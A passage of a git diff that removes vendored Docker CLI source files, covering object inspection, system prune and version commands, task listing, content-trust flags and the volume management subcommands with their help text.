-		},
-		{
-			objectType:      "service",
-			isSwarmObject:   true,
-			objectInspector: inspectService(ctx, dockerCli),
-		},
-		{
-			objectType:      "task",
-			isSwarmObject:   true,
-			objectInspector: inspectTasks(ctx, dockerCli),
-		},
-		{
-			objectType:      "node",
-			isSwarmObject:   true,
-			objectInspector: inspectNode(ctx, dockerCli),
-		},
-		{
-			objectType:      "plugin",
-			objectInspector: inspectPlugin(ctx, dockerCli),
-		},
-	}
-
-	// isSwarmManager does an Info API call to verify that the daemon is
-	// a swarm manager.
-	isSwarmManager := func() bool {
-		info, err := dockerCli.Client().Info(ctx)
-		if err != nil {
-			fmt.Fprintln(dockerCli.Err(), err)
-			return false
-		}
-		return info.Swarm.ControlAvailable
-	}
-
-	isErrNotSupported := func(err error) bool {
-		return strings.Contains(err.Error(), "not supported")
-	}
-
-	return func(ref string) (interface{}, []byte, error) {
-		const (
-			swarmSupportUnknown = iota
-			swarmSupported
-			swarmUnsupported
-		)
-
-		isSwarmSupported := swarmSupportUnknown
-
-		for _, inspectData := range inspectAutodetect {
-			if typeConstraint != "" && inspectData.objectType != typeConstraint {
-				continue
-			}
-			if typeConstraint == "" && inspectData.isSwarmObject {
-				if isSwarmSupported == swarmSupportUnknown {
-					if isSwarmManager() {
-						isSwarmSupported = swarmSupported
-					} else {
-						isSwarmSupported = swarmUnsupported
-					}
-				}
-				if isSwarmSupported == swarmUnsupported {
-					continue
-				}
-			}
-			v, raw, err := inspectData.objectInspector(ref)
-			if err != nil {
-				if typeConstraint == "" && (apiclient.IsErrNotFound(err) || isErrNotSupported(err)) {
-					continue
-				}
-				return v, raw, err
-			}
-			if getSize && !inspectData.isSizeSupported {
-				fmt.Fprintf(dockerCli.Err(), "WARNING: --size ignored for %s\n", inspectData.objectType)
-			}
-			return v, raw, err
-		}
-		return nil, nil, fmt.Errorf("Error: No such object: %s", ref)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/system/prune.go b/vendor/github.com/docker/docker/cli/command/system/prune.go
deleted file mode 100644
index 92dddbdca6..0000000000
--- a/vendor/github.com/docker/docker/cli/command/system/prune.go
+++ /dev/null
@@ -1,93 +0,0 @@
-package system
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/prune"
-	units "github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type pruneOptions struct {
-	force bool
-	all   bool
-}
-
-// NewPruneCommand creates a new cobra.Command for `docker prune`
-func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts pruneOptions
-
-	cmd := &cobra.Command{
-		Use:   "prune [OPTIONS]",
-		Short: "Remove unused data",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runPrune(dockerCli, opts)
-		},
-		Tags: map[string]string{"version": "1.25"},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
-	flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images not just dangling ones")
-
-	return cmd
-}
-
-const (
-	warning = `WARNING! This will remove:
-	- all stopped containers
-	- all volumes not used by at least one container
-	- all networks not used by at least one container
-	%s
-Are you sure you want to continue?`
-
-	danglingImageDesc = "- all dangling images"
-	allImageDesc      = `- all images without at least one container associated to them`
-)
-
-func runPrune(dockerCli *command.DockerCli, opts pruneOptions) error {
-	var message string
-
-	if opts.all {
-		message = fmt.Sprintf(warning, allImageDesc)
-	} else {
-		message = fmt.Sprintf(warning, danglingImageDesc)
-	}
-
-	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), message) {
-		return nil
-	}
-
-	var spaceReclaimed uint64
-
-	for _, pruneFn := range []func(dockerCli *command.DockerCli) (uint64, string, error){
-		prune.RunContainerPrune,
-		prune.RunVolumePrune,
-		prune.RunNetworkPrune,
-	} {
-		spc, output, err := pruneFn(dockerCli)
-		if err != nil {
-			return err
-		}
-		spaceReclaimed += spc
-		if output != "" {
-			fmt.Fprintln(dockerCli.Out(), output)
-		}
-	}
-
-	spc, output, err := prune.RunImagePrune(dockerCli, opts.all)
-	if err != nil {
-		return err
-	}
-	if spc > 0 {
-		spaceReclaimed += spc
-		fmt.Fprintln(dockerCli.Out(), output)
-	}
-
-	fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed)))
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/system/version.go b/vendor/github.com/docker/docker/cli/command/system/version.go
deleted file mode 100644
index ded4f4d118..0000000000
--- a/vendor/github.com/docker/docker/cli/command/system/version.go
+++ /dev/null
@@ -1,113 +0,0 @@
-package system
-
-import (
-	"fmt"
-	"runtime"
-	"time"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/dockerversion"
-	"github.com/docker/docker/utils/templates"
-	"github.com/spf13/cobra"
-)
-
-var versionTemplate = `Client:
- Version:      {{.Client.Version}}
- API version:  {{.Client.APIVersion}}
- Go version:   {{.Client.GoVersion}}
- Git commit:   {{.Client.GitCommit}}
- Built:        {{.Client.BuildTime}}
- OS/Arch:      {{.Client.Os}}/{{.Client.Arch}}{{if .ServerOK}}
-
-Server:
- Version:      {{.Server.Version}}
- API version:  {{.Server.APIVersion}} (minimum version {{.Server.MinAPIVersion}})
- Go version:   {{.Server.GoVersion}}
- Git commit:   {{.Server.GitCommit}}
- Built:        {{.Server.BuildTime}}
- OS/Arch:      {{.Server.Os}}/{{.Server.Arch}}
- Experimental: {{.Server.Experimental}}{{end}}`
-
-type versionOptions struct {
-	format string
-}
-
-// NewVersionCommand creates a new cobra.Command for `docker version`
-func NewVersionCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts versionOptions
-
-	cmd := &cobra.Command{
-		Use:   "version [OPTIONS]",
-		Short: "Show the Docker version information",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runVersion(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-
-	return cmd
-}
-
-func runVersion(dockerCli *command.DockerCli, opts *versionOptions) error {
-	ctx := context.Background()
-
-	templateFormat := versionTemplate
-	if opts.format != "" {
-		templateFormat = opts.format
-	}
-
-	tmpl, err := templates.Parse(templateFormat)
-	if err != nil {
-		return cli.StatusError{StatusCode: 64,
-			Status: "Template parsing error: " + err.Error()}
-	}
-
-	APIVersion := dockerCli.Client().ClientVersion()
-	if defaultAPIVersion := dockerCli.DefaultVersion(); APIVersion != defaultAPIVersion {
-		APIVersion = fmt.Sprintf("%s (downgraded from %s)", APIVersion, defaultAPIVersion)
-	}
-
-	vd := types.VersionResponse{
-		Client: &types.Version{
-			Version:    dockerversion.Version,
-			APIVersion: APIVersion,
-			GoVersion:  runtime.Version(),
-			GitCommit:  dockerversion.GitCommit,
-			BuildTime:  dockerversion.BuildTime,
-			Os:         runtime.GOOS,
-			Arch:       runtime.GOARCH,
-		},
-	}
-
-	serverVersion, err := dockerCli.Client().ServerVersion(ctx)
-	if err == nil {
-		vd.Server = &serverVersion
-	}
-
-	// first we need to make BuildTime more human friendly
-	t, errTime := time.Parse(time.RFC3339Nano, vd.Client.BuildTime)
-	if errTime == nil {
-		vd.Client.BuildTime = t.Format(time.ANSIC)
-	}
-
-	if vd.ServerOK() {
-		t, errTime = time.Parse(time.RFC3339Nano, vd.Server.BuildTime)
-		if errTime == nil {
-			vd.Server.BuildTime = t.Format(time.ANSIC)
-		}
-	}
-
-	if err2 := tmpl.Execute(dockerCli.Out(), vd); err2 != nil && err == nil {
-		err = err2
-	}
-	dockerCli.Out().Write([]byte{'\n'})
-	return err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/task/print.go b/vendor/github.com/docker/docker/cli/command/task/print.go
deleted file mode 100644
index 0f1c2cf724..0000000000
--- a/vendor/github.com/docker/docker/cli/command/task/print.go
+++ /dev/null
@@ -1,161 +0,0 @@
-package task
-
-import (
-	"fmt"
-	"io"
-	"sort"
-	"strings"
-	"text/tabwriter"
-	"time"
-
-	"golang.org/x/net/context"
-
-	distreference "github.com/docker/distribution/reference"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/idresolver"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/go-units"
-)
-
-const (
-	psTaskItemFmt = "%s\t%s\t%s\t%s\t%s\t%s %s ago\t%s\t%s\n"
-	maxErrLength  = 30
-)
-
-type portStatus swarm.PortStatus
-
-func (ps portStatus) String() string {
-	if len(ps.Ports) == 0 {
-		return ""
-	}
-
-	str := fmt.Sprintf("*:%d->%d/%s", ps.Ports[0].PublishedPort, ps.Ports[0].TargetPort, ps.Ports[0].Protocol)
-	for _, pConfig := range ps.Ports[1:] {
-		str += fmt.Sprintf(",*:%d->%d/%s", pConfig.PublishedPort, pConfig.TargetPort, pConfig.Protocol)
-	}
-
-	return str
-}
-
-type tasksBySlot []swarm.Task
-
-func (t tasksBySlot) Len() int {
-	return len(t)
-}
-
-func (t tasksBySlot) Swap(i, j int) {
-	t[i], t[j] = t[j], t[i]
-}
-
-func (t tasksBySlot) Less(i, j int) bool {
-	// Sort by slot.
-	if t[i].Slot != t[j].Slot {
-		return t[i].Slot < t[j].Slot
-	}
-
-	// If same slot, sort by most recent.
-	return t[j].Meta.CreatedAt.Before(t[i].CreatedAt)
-}
-
-// Print task information in a table format.
-// Besides this, command `docker node ps <node>`
-// and `docker stack ps` will call this, too.
-func Print(dockerCli *command.DockerCli, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error {
-	sort.Stable(tasksBySlot(tasks))
-
-	writer := tabwriter.NewWriter(dockerCli.Out(), 0, 4, 2, ' ', 0)
-
-	// Ignore flushing errors
-	defer writer.Flush()
-	fmt.Fprintln(writer, strings.Join([]string{"ID", "NAME", "IMAGE", "NODE", "DESIRED STATE", "CURRENT STATE", "ERROR", "PORTS"}, "\t"))
-
-	if err := print(writer, ctx, tasks, resolver, noTrunc); err != nil {
-		return err
-	}
-
-	return nil
-}
-
-// PrintQuiet shows task list in a quiet way.
-func PrintQuiet(dockerCli *command.DockerCli, tasks []swarm.Task) error {
-	sort.Stable(tasksBySlot(tasks))
-
-	out := dockerCli.Out()
-
-	for _, task := range tasks {
-		fmt.Fprintln(out, task.ID)
-	}
-
-	return nil
-}
-
-func print(out io.Writer, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error {
-	prevName := ""
-	for _, task := range tasks {
-		id := task.ID
-		if !noTrunc {
-			id = stringid.TruncateID(id)
-		}
-
-		serviceName, err := resolver.Resolve(ctx, swarm.Service{}, task.ServiceID)
-		if err != nil {
-			return err
-		}
-
-		nodeValue, err := resolver.Resolve(ctx, swarm.Node{}, task.NodeID)
-		if err != nil {
-			return err
-		}
-
-		name := ""
-		if task.Slot != 0 {
-			name = fmt.Sprintf("%v.%v", serviceName, task.Slot)
-		} else {
-			name = fmt.Sprintf("%v.%v", serviceName, task.NodeID)
-		}
-
-		// Indent the name if necessary
-		indentedName := name
-		if name == prevName {
-			indentedName = fmt.Sprintf(" \\_ %s", indentedName)
-		}
-		prevName = name
-
-		// Trim and quote the error message.
-		taskErr := task.Status.Err
-		if !noTrunc && len(taskErr) > maxErrLength {
-			taskErr = fmt.Sprintf("%s…", taskErr[:maxErrLength-1])
-		}
-		if len(taskErr) > 0 {
-			taskErr = fmt.Sprintf("\"%s\"", taskErr)
-		}
-
-		image := task.Spec.ContainerSpec.Image
-		if !noTrunc {
-			ref, err := distreference.ParseNamed(image)
-			if err == nil {
-				// update image string for display
-				namedTagged, ok := ref.(distreference.NamedTagged)
-				if ok {
-					image = namedTagged.Name() + ":" + namedTagged.Tag()
-				}
-			}
-		}
-
-		fmt.Fprintf(
-			out,
-			psTaskItemFmt,
-			id,
-			indentedName,
-			image,
-			nodeValue,
-			command.PrettyPrint(task.DesiredState),
-			command.PrettyPrint(task.Status.State),
-			strings.ToLower(units.HumanDuration(time.Since(task.Status.Timestamp))),
-			taskErr,
-			portStatus(task.Status.PortStatus),
-		)
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/trust.go b/vendor/github.com/docker/docker/cli/command/trust.go
deleted file mode 100644
index b4c8a84ee5..0000000000
--- a/vendor/github.com/docker/docker/cli/command/trust.go
+++ /dev/null
@@ -1,39 +0,0 @@
-package command
-
-import (
-	"os"
-	"strconv"
-
-	"github.com/spf13/pflag"
-)
-
-var (
-	// TODO: make this not global
-	untrusted bool
-)
-
-// AddTrustedFlags adds content trust flags to the current command flagset
-func AddTrustedFlags(fs *pflag.FlagSet, verify bool) {
-	trusted, message := setupTrustedFlag(verify)
-	fs.BoolVar(&untrusted, "disable-content-trust", !trusted, message)
-}
-
-func setupTrustedFlag(verify bool) (bool, string) {
-	var trusted bool
-	if e := os.Getenv("DOCKER_CONTENT_TRUST"); e != "" {
-		if t, err := strconv.ParseBool(e); t || err != nil {
-			// treat any other value as true
-			trusted = true
-		}
-	}
-	message := "Skip image signing"
-	if verify {
-		message = "Skip image verification"
-	}
-	return trusted, message
-}
-
-// IsTrusted returns true if content trust is enabled
-func IsTrusted() bool {
-	return !untrusted
-}
diff --git a/vendor/github.com/docker/docker/cli/command/utils.go b/vendor/github.com/docker/docker/cli/command/utils.go
deleted file mode 100644
index 1837ca41f0..0000000000
--- a/vendor/github.com/docker/docker/cli/command/utils.go
+++ /dev/null
@@ -1,87 +0,0 @@
-package command
-
-import (
-	"fmt"
-	"io"
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"runtime"
-	"strings"
-)
-
-// CopyToFile writes the content of the reader to the specified file
-func CopyToFile(outfile string, r io.Reader) error {
-	tmpFile, err := ioutil.TempFile(filepath.Dir(outfile), ".docker_temp_")
-	if err != nil {
-		return err
-	}
-
-	tmpPath := tmpFile.Name()
-
-	_, err = io.Copy(tmpFile, r)
-	tmpFile.Close()
-
-	if err != nil {
-		os.Remove(tmpPath)
-		return err
-	}
-
-	if err = os.Rename(tmpPath, outfile); err != nil {
-		os.Remove(tmpPath)
-		return err
-	}
-
-	return nil
-}
-
-// capitalizeFirst capitalizes the first character of string
-func capitalizeFirst(s string) string {
-	switch l := len(s); l {
-	case 0:
-		return s
-	case 1:
-		return strings.ToLower(s)
-	default:
-		return strings.ToUpper(string(s[0])) + strings.ToLower(s[1:])
-	}
-}
-
-// PrettyPrint outputs arbitrary data for human formatted output by uppercasing the first letter.
-func PrettyPrint(i interface{}) string {
-	switch t := i.(type) {
-	case nil:
-		return "None"
-	case string:
-		return capitalizeFirst(t)
-	default:
-		return capitalizeFirst(fmt.Sprintf("%s", t))
-	}
-}
-
-// PromptForConfirmation requests and checks confirmation from user.
-// This will display the provided message followed by ' [y/N] '. If
-// the user input 'y' or 'Y' it returns true other false.  If no
-// message is provided "Are you sure you want to proceed? [y/N] "
-// will be used instead.
-func PromptForConfirmation(ins *InStream, outs *OutStream, message string) bool {
-	if message == "" {
-		message = "Are you sure you want to proceed?"
-	}
-	message += " [y/N] "
-
-	fmt.Fprintf(outs, message)
-
-	// On Windows, force the use of the regular OS stdin stream.
-	if runtime.GOOS == "windows" {
-		ins = NewInStream(os.Stdin)
-	}
-
-	answer := ""
-	n, _ := fmt.Fscan(ins, &answer)
-	if n != 1 || (answer != "y" && answer != "Y") {
-		return false
-	}
-
-	return true
-}
diff --git a/vendor/github.com/docker/docker/cli/command/volume/cmd.go b/vendor/github.com/docker/docker/cli/command/volume/cmd.go
deleted file mode 100644
index 40862f29d1..0000000000
--- a/vendor/github.com/docker/docker/cli/command/volume/cmd.go
+++ /dev/null
@@ -1,45 +0,0 @@
-package volume
-
-import (
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-)
-
-// NewVolumeCommand returns a cobra command for `volume` subcommands
-func NewVolumeCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "volume COMMAND",
-		Short: "Manage volumes",
-		Long:  volumeDescription,
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		newCreateCommand(dockerCli),
-		newInspectCommand(dockerCli),
-		newListCommand(dockerCli),
-		newRemoveCommand(dockerCli),
-		NewPruneCommand(dockerCli),
-	)
-	return cmd
-}
-
-var volumeDescription = `
-The **docker volume** command has subcommands for managing data volumes. A data
-volume is a specially-designated directory that by-passes storage driver
-management.
-
-Data volumes persist data independent of a container's life cycle. When you
-delete a container, the Docker daemon does not delete any data volumes. You can
-share volumes across multiple containers. Moreover, you can share data volumes
-with other computing resources in your system.
-
-To see help for a subcommand, use:
-
-    docker volume COMMAND --help
-
-For full details on using docker volume visit Docker's online documentation.
-
-`
diff --git a/vendor/github.com/docker/docker/cli/command/volume/create.go b/vendor/github.com/docker/docker/cli/command/volume/create.go
deleted file mode 100644
index 7b2a7e3318..0000000000
--- a/vendor/github.com/docker/docker/cli/command/volume/create.go
+++ /dev/null
@@ -1,111 +0,0 @@
-package volume
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	volumetypes "github.com/docker/docker/api/types/volume"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/spf13/cobra"
-)
-
-type createOptions struct {
-	name       string
-	driver     string
-	driverOpts opts.MapOpts
-	labels     opts.ListOpts
-}
-
-func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := createOptions{
-		driverOpts: *opts.NewMapOpts(nil, nil),
-		labels:     opts.NewListOpts(runconfigopts.ValidateEnv),
-	}
-
-	cmd := &cobra.Command{
-		Use:   "create [OPTIONS] [VOLUME]",
-		Short: "Create a volume",
-		Long:  createDescription,
-		Args:  cli.RequiresMaxArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			if len(args) == 1 {
-				if opts.name != "" {
-					fmt.Fprint(dockerCli.Err(), "Conflicting options: either specify --name or provide positional arg, not both\n")
-					return cli.StatusError{StatusCode: 1}
-				}
-				opts.name = args[0]
-			}
-			return runCreate(dockerCli, opts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.driver, "driver", "d", "local", "Specify volume driver name")
-	flags.StringVar(&opts.name, "name", "", "Specify volume name")
-	flags.Lookup("name").Hidden = true
-	flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options")
-	flags.Var(&opts.labels, "label", "Set metadata for a volume")
-
-	return cmd
-}
-
-func runCreate(dockerCli *command.DockerCli, opts createOptions) error {
-	client := dockerCli.Client()
-
-	volReq := volumetypes.VolumesCreateBody{
-		Driver:     opts.driver,
-		DriverOpts: opts.driverOpts.GetAll(),
-		Name:       opts.name,
-		Labels:     runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()),
-	}
-
-	vol, err := client.VolumeCreate(context.Background(), volReq)
-	if err != nil {
-		return err
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "%s\n", vol.Name)
-	return nil
-}
-
-var createDescription = `
-Creates a new volume that containers can consume and store data in. If a name
-is not specified, Docker generates a random name. You create a volume and then
-configure the container to use it, for example:
-
-    $ docker volume create hello
-    hello
-    $ docker run -d -v hello:/world busybox ls /world
-
-The mount is created inside the container's **/src** directory. Docker doesn't
-not support relative paths for mount points inside the container.
-
-Multiple containers can use the same volume in the same time period. This is
-useful if two containers need access to shared data. For example, if one
-container writes and the other reads the data.
-
-## Driver specific options
-
-Some volume drivers may take options to customize the volume creation. Use the
-**-o** or **--opt** flags to pass driver options:
-
-    $ docker volume create --driver fake --opt tardis=blue --opt timey=wimey
-
-These options are passed directly to the volume driver. Options for different
-volume drivers may do different things (or nothing at all).
-
-The built-in **local** driver on Windows does not support any options.
-
-The built-in **local** driver on Linux accepts options similar to the linux
-**mount** command:
-
-    $ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000
-
-Another example:
-
-    $ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2
-
-`
diff --git a/vendor/github.com/docker/docker/cli/command/volume/inspect.go b/vendor/github.com/docker/docker/cli/command/volume/inspect.go
deleted file mode 100644
index 5eb8ad2516..0000000000
--- a/vendor/github.com/docker/docker/cli/command/volume/inspect.go
+++ /dev/null
@@ -1,55 +0,0 @@
-package volume
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/inspect"
-	"github.com/spf13/cobra"
-)
-
-type inspectOptions struct {
-	format string
-	names  []string
-}
-
-func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts inspectOptions
-
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] VOLUME [VOLUME...]",
-		Short: "Display detailed information on one or more volumes",
-		Long:  inspectDescription,
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.names = args
-			return runInspect(dockerCli, opts)
-		},
-	}
-
-	cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-
-	return cmd
-}
-
-func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	client := dockerCli.Client()
-
-	ctx := context.Background()
-
-	getVolFunc := func(name string) (interface{}, []byte, error) {
-		i, err := client.VolumeInspect(ctx, name)
-		return i, nil, err
-	}
-
-	return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getVolFunc)
-}
-
-var inspectDescription = `
-Returns information about one or more volumes. By default, this command renders
-all results in a JSON array. You can specify an alternate format to execute a
-given template is executed for each result. Go's https://golang.org/pkg/text/template/
-package describes all the details of the format.
-
-`
diff --git a/vendor/github.com/docker/docker/cli/command/volume/list.go b/vendor/github.com/docker/docker/cli/command/volume/list.go
deleted file mode 100644
index d76006a1b2..0000000000
--- a/vendor/github.com/docker/docker/cli/command/volume/list.go
+++ /dev/null
@@ -1,91 +0,0 @@
-package volume
-
-import (
-	"sort"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/formatter"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-)
-
-type byVolumeName []*types.Volume
-
-func (r byVolumeName) Len() int      { return len(r) }
-func (r byVolumeName) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
-func (r byVolumeName) Less(i, j int) bool {
-	return r[i].Name < r[j].Name
-}
-
-type listOptions struct {
-	quiet  bool
-	format string
-	filter opts.FilterOpt
-}
-
-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := listOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:     "ls [OPTIONS]",
-		Aliases: []string{"list"},
-		Short:   "List volumes",
-		Long:    listDescription,
-		Args:    cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runList(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display volume names")
-	flags.StringVar(&opts.format, "format", "", "Pretty-print volumes using a Go template")
-	flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 'dangling=true')")
-
-	return cmd
-}
-
-func runList(dockerCli *command.DockerCli, opts listOptions) error {
-	client := dockerCli.Client()
-	volumes, err := client.VolumeList(context.Background(), opts.filter.Value())
-	if err != nil {
-		return err
-	}
-
-	format := opts.format
-	if len(format) == 0 {
-		if len(dockerCli.ConfigFile().VolumesFormat) > 0 && !opts.quiet {
-			format = dockerCli.ConfigFile().VolumesFormat
-		} else {
-			format = formatter.TableFormatKey
-		}
-	}
-
-	sort.Sort(byVolumeName(volumes.Volumes))
-
-	volumeCtx := formatter.Context{
-		Output: dockerCli.Out(),
-		Format: formatter.NewVolumeFormat(format, opts.quiet),
-	}
-	return formatter.VolumeWrite(volumeCtx, volumes.Volumes)
-}
-
-var listDescription = `
-
-Lists all the volumes Docker manages. You can filter using the **-f** or
-**--filter** flag. The filtering format is a **key=value** pair. To specify
-more than one filter,  pass multiple flags (for example,
-**--filter "foo=bar" --filter "bif=baz"**)
-
-The currently supported filters are:
-
-* **dangling** (boolean - **true** or **false**, **1** or **0**)
-* **driver** (a volume driver's name)
-* **label** (**label=<key>** or **label=<key>=<value>**)
-* **name** (a volume's name)
-
-`
diff --git a/vendor/github.com/docker/docker/cli/command/volume/prune.go b/vendor/github.com/docker/docker/cli/command/volume/prune.go
deleted file mode 100644
index 405fbeb295..0000000000
--- a/vendor/github.com/docker/docker/cli/command/volume/prune.go
+++ /dev/null
@@ -1,75 +0,0 @@
-package volume
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	units "github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type pruneOptions struct {
-	force bool
-}
-
-// NewPruneCommand returns a new cobra prune command for volumes
-func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts pruneOptions
-
-	cmd := &cobra.Command{
-		Use:   "prune [OPTIONS]",
-		Short: "Remove all unused volumes",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			spaceReclaimed, output, err := runPrune(dockerCli, opts)
-			if err != nil {
-				return err
-			}
-			if output != "" {
-				fmt.Fprintln(dockerCli.Out(), output)
-			}
-			fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed)))
-			return nil
-		},
-		Tags: map[string]string{"version": "1.25"},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
-
-	return cmd
-}
-
-const warning = `WARNING! This will remove all volumes not used by at least one container.
-Are you sure you want to continue?`
-
-func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) {
-	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) {
-		return
-	}
-
-	report, err := dockerCli.Client().VolumesPrune(context.Background(), filters.Args{})
-	if err != nil {
-		return
-	}
-
-	if len(report.VolumesDeleted) > 0 {
-		output = "Deleted Volumes:\n"
-		for _, id := range report.VolumesDeleted {
-			output += id + "\n"
-		}
-		spaceReclaimed = report.SpaceReclaimed
-	}
-
-	return
-}
-
-// RunPrune calls the Volume Prune API
-// This returns the amount of space reclaimed and a detailed output string
-func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) {
-	return runPrune(dockerCli, pruneOptions{force: true})
-}
diff --git a/vendor/github.com/docker/docker/cli/command/volume/remove.go b/vendor/github.com/docker/docker/cli/command/volume/remove.go
deleted file mode 100644
index f464bb3e1a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/volume/remove.go
+++ /dev/null
@@ -1,68 +0,0 @@
-package volume
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type removeOptions struct {
-	force bool
-
-	volumes []string
-}
-
-func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts removeOptions
-
-	cmd := &cobra.Command{
-		Use:     "rm [OPTIONS] VOLUME [VOLUME...]",
-		Aliases: []string{"remove"},
-		Short:   "Remove one or more volumes",
-		Long:    removeDescription,
-		Example: removeExample,
-		Args:    cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.volumes = args
-			return runRemove(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of one or more volumes")
-	flags.SetAnnotation("force", "version", []string{"1.25"})
-	return cmd
-}
-
-func runRemove(dockerCli *command.DockerCli, opts *removeOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-	status := 0
-
-	for _, name := range opts.volumes {
-		if err := client.VolumeRemove(ctx, name, opts.force); err != nil {
-			fmt.Fprintf(dockerCli.Err(), "%s\n", err)
-			status = 1
-			continue
-		}
-		fmt.Fprintf(dockerCli.Out(), "%s\n", name)
-	}
-
-	if status != 0 {
-		return cli.StatusError{StatusCode: status}
-	}
-	return nil
-}
-
-var removeDescription = `
-Remove one or more volumes. You cannot remove a volume that is in use by a container.
-`
-
-var removeExample = `
-$ docker volume rm hello
-hello
-`
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose.go b/vendor/github.com/docker/docker/cli/compose/convert/compose.go
deleted file mode 100644
index 8122326aa5..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/convert/compose.go
+++ /dev/null
@@ -1,116 +0,0 @@
-package convert
-
-import (
-	"io/ioutil"
-
-	"github.com/docker/docker/api/types"
-	networktypes "github.com/docker/docker/api/types/network"
-	"github.com/docker/docker/api/types/swarm"
-	composetypes "github.com/docker/docker/cli/compose/types"
-)
-
-const (
-	// LabelNamespace is the label used to track stack resources
-	LabelNamespace = "com.docker.stack.namespace"
-)
-
-// Namespace mangles names by prepending the name
-type Namespace struct {
-	name string
-}
-
-// Scope prepends the namespace to a name
-func (n Namespace) Scope(name string) string {
-	return n.name + "_" + name
-}
-
-// Name returns the name of the namespace
-func (n Namespace) Name() string {
-	return n.name
-}
-
-// NewNamespace returns a new Namespace for scoping of names
